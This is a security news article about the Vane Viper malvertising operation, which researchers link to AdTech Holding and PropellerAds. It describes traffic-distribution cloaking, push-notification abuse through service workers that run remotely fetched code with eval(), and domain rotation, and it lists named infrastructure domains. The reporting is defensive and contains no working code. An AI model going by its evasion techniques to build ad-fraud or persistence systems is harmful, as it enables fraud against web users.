The digital advertising ecosystem has become a prime hunting ground for cybercriminals, who are increasingly exploiting advertising technology companies to distribute malware and conduct malicious campaigns.
Rather than simply abusing legitimate platforms, threat actors are now operating as the platforms themselves, creating a sophisticated web of deception that leverages the inherent complexity and fragmentation of the adtech supply chain to avoid accountability.
Recent investigations have uncovered a massive operation involving Vane Viper, a threat actor that has appeared in approximately half of customer networks monitored by security researchers, generating about one trillion DNS queries over the past year.
This operation benefits from hundreds of thousands of compromised websites and strategically placed advertisements across gaming, shopping, and blog sites worldwide.
The actor’s infrastructure spans approximately 60,000 domains, representing only a fraction of the broader malicious ecosystem they control.
The sophistication of this campaign lies in its carefully constructed corporate structure designed for plausible deniability.
Corporate filings trace Vane Viper to AdTech Holding, a Cyprus-based company whose flagship subsidiary, PropellerAds, operates as both an advertising network and traffic broker.
.webp "Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads 3")
Infoblox researchers identified compelling evidence suggesting that PropellerAds has moved beyond merely turning a blind eye to criminal abuse of their platform, with indicators pointing to several ad-fraud campaigns originating directly from infrastructure attributed to the company.
The malvertising operation employs a complex traffic distribution system (TDS) that routes users through multiple layers of redirection before delivering malicious payloads.
This approach allows the actors to serve legitimate content to automated security tools while directing human users to malicious destinations.
The campaign’s reach extends beyond traditional malware distribution, encompassing fake shopping sites, fraudulent browser extensions, survey scams, and adult content designed to maximize profit from compromised traffic.
Push Notification Persistence Mechanism
The most insidious aspect of Vane Viper’s operation involves the abuse of browser push notifications to achieve persistent access to victim devices.
The campaign utilizes malicious service workers, JavaScript files that intercept network requests between web applications and servers, to manipulate browser behavior and maintain long-term access to compromised systems.
.webp "Threat Actors Abuse Adtech Companies to Target Users With Malicious Ads 4")
These service workers employ script chaining techniques to abuse push notifications, with the most concerning element being their use of the eval() function to execute arbitrary content fetched from remote URLs.
The remote URL is determined by hardcoded domains within the service worker, creating a dynamic command and control mechanism that can adapt to changing operational requirements.
Once users accept push notifications, their devices become part of a persistent malvertising network, enabling a continuous stream of malicious advertisements.
The operation demonstrates remarkable resilience through its domain management strategy, cycling through thousands of newly registered domains each month while maintaining key push notification domains for years.
Analysis reveals that most operational domains remain active for less than a month, with registration counts reaching 3,500 domains in peak months, while core infrastructure domains like omnatuor.com, propeller-tracking.com, and various push notification services including in-page-push.com and pushimg.com have maintained operations for over 1,200 days, ensuring operational continuity despite takedown attempts.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for Free
Source link
